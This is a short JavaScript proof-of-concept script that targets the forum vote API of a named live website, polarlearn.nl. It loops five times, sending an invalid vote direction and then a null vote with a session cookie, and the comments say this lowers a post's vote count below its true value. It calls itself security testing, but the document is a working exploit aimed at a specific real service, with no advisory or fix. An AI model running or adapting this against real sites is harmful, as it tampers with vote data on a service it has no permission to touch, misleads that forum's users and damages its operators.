const POST_ID = "POST ID";
const TARGET_URL = "https://polarlearn.nl/api/v1/forum/vote";
const COOKIE = "COOKIE";

async function runTest() {
  console.log(`[!] Testing vulnerability on post: ${POST_ID}`);

  for (let i = 1; i <= 5; i++) {
    const exploitRes = await fetch(TARGET_URL, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
        "Cookie": COOKIE,
        "User-Agent": "Security-Testing-PoC"
      },
      body: JSON.stringify({
        postId: POST_ID,
        direction: "invalid_direction"
      })
    });

    const clearRes = await fetch(TARGET_URL, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
        "Cookie": COOKIE
      },
      body: JSON.stringify({
        postId: POST_ID,
        direction: null
      })
    });

    if (exploitRes.ok && clearRes.ok) {
      console.log(`[+] Cycle ${i} complete: Vote count should have dropped by 1.`);
    } else {
      console.error(`[-] Cycle ${i} failed. Status: ${exploitRes.status}`);
      break;
    }
  }

  console.log(
    "[*] Finished. Refresh the forum page to see if the vote count is lower than it should be."
  );
}

runTest();
